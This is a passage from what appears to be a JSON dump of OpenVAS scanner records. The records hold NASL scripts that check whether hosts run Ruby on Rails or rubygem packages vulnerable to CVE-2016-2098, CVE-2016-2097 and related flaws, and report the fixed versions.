script_xref(name:\"URL\", value:\"http://weblog.rubyonrails.org/2016/8/11/Rails-5-0-0-1-4-2-7-2-and-3-2-22-3-have-been-released\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version =~ \"^(3\\.)\")\n{\n if( version_is_less( version: version, test_version: \"3.2.22.3\" ) )\n {\n fix = \"3.2.22.3\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"4.2.7.1\" ) )\n {\n fix = \"4.2.7.1\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(5\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"5.0.0.1\" ) )\n {\n fix = \"5.0.0.1\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-27T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionview FEDORA-2016-0d9890f7b5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310809170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionview FEDORA-2016-0d9890f7b5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809170\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-27 05:53:30 +0200 (Sat, 27 Aug 2016)\");\n script_cve_id(\"CVE-2016-6316\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionview FEDORA-2016-0d9890f7b5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionview on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0d9890f7b5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4APXKS7NQ42L26TII23EU4OR5UUM7PGI\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionview\", rpm:\"rubygem-actionview~4.2.5.2~3.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activesupport FEDORA-2016-3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807436", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807436", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activesupport FEDORA-2016-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807436\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-29 06:24:52 +0100 (Mon, 29 Feb 2016)\");\n script_cve_id(\"CVE-2015-7576\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activesupport FEDORA-2016-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activesupport'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activesupport on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-3\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178068.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activesupport\", rpm:\"rubygem-activesupport~4.2.3~3.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-21T21:55:14", "description": "This host is running Ruby on Rails and is\n prone to remote code execution vulnerability.", "cvss3": {}, "published": "2016-10-14T00:00:00", "type": "openvas", "title": "Ruby on Rails Action Pack Remote Code Execution Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809353", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809353", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action Pack Remote Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809353\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-2098\");\n script_bugtraq_id(83725);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-14 16:40:26 +0530 (Fri, 14 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Ruby on Rails Action Pack Remote Code Execution Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper sanitization\n of user supplied inputs to the 'render' method in a controller or view by\n 'Action Pack'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to control the arguments of the render method in a controller or a view,\n resulting in the possibility of executing arbitrary ruby code.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.2,\n Ruby on Rails 4.x before 4.1.14.2 and\n Ruby on Rails 4.2.x before 4.2.5.2 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.2 or 4.1.14.2 or\n 4.2.5.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2016/dsa-3509\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/message/raw?msg=rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ruby/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less (version: version, test_version: \"3.2.22.2\" ) )\n{\n fix = \"3.2.22.2\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.1)\" )\n{\n if( version_is_less( version: version, test_version: \"4.1.14.2\" ) )\n {\n fix = \"4.1.14.2\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(4\\.2)\" )\n{\n if( version_is_less( version: version, test_version:\"4.2.5.2\" ) )\n {\n fix = \"4.2.5.2\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:34:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for rubygem-actionview-4_2 (openSUSE-SU-2016:0790-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851240", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851240", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851240\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-03-17 05:11:27 +0100 (Thu, 17 Mar 2016)\");\n script_cve_id(\"CVE-2016-2098\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for rubygem-actionview-4_2 (openSUSE-SU-2016:0790-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview-4_2'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for rubygem-actionview-4_2 fixes the following issues:\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (boo#968849)\");\n\n script_tag(name:\"affected\", value:\"rubygem-actionview-4_2 on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:0790-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-rubygem-actionview-4_2\", rpm:\"ruby2.1-rubygem-actionview-4_2~4.2.4~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-rubygem-actionview-doc-4_2\", rpm:\"uby2.1-rubygem-actionview-doc-4_2~4.2.4~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-18T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionview FEDORA-2016-3954061", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807706", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807706", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionview FEDORA-2016-3954061\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807706\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-18 05:31:39 +0100 (Fri, 18 Mar 2016)\");\n script_cve_id(\"CVE-2016-2098\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionview FEDORA-2016-3954061\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionview on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-3954061\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179025.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionview\", rpm:\"rubygem-actionview~4.2.0~5.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-18T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionpack FEDORA-2016-3954061", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807704", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807704", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionpack FEDORA-2016-3954061\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807704\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-18 05:31:22 +0100 (Fri, 18 Mar 2016)\");\n script_cve_id(\"CVE-2016-2098\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionpack FEDORA-2016-3954061\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionpack'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionpack on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-3954061\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179026.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionpack\", rpm:\"rubygem-actionpack~4.2.0~4.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T21:53:52", "description": "This host is running Ruby on Rails and is\n prone to remote code execution vulnerability.", "cvss3": {}, "published": "2016-10-14T00:00:00", "type": "openvas", "title": "Ruby on Rails Action Pack Remote Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809352", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809352", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action Pack Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809352\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-2098\");\n script_bugtraq_id(83725);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-14 18:40:26 +0530 (Fri, 14 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Ruby on Rails Action Pack Remote Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper sanitization of\n user supplied inputs to the 'render' method in a controller or view by\n 'Action Pack'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to control the arguments of the render method in a controller or a view,\n resulting in the possibility of executing arbitrary ruby code.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.2,\n Ruby on Rails 4.x before 4.1.14.2 and\n Ruby on Rails 4.2.x before 4.2.5.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.2 or 4.1.14.2 or\n 4.2.5.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2016/dsa-3509\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/message/raw?msg=rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less( version: version, test_version: \"3.2.22.2\" ) )\n{\n fix = \"3.2.22.2\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.1)\" )\n{\n if( version_is_less( version: version, test_version:\"4.1.14.2\" ) )\n {\n fix = \"4.1.14.2\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(4\\.2)\" )\n{\n if( version_is_less( version: version, test_version: \"4.2.5.2\" ) )\n {\n fix = \"4.2.5.2\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T21:53:54", "description": "This host is running Ruby on Rails and is\n prone to directory traversal vulnerability.", "cvss3": {}, "published": "2016-10-14T00:00:00", "type": "openvas", "title": "Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2097"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809354", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809354", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action View 'render' Directory Traversal Vulnerability (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809354\");\n 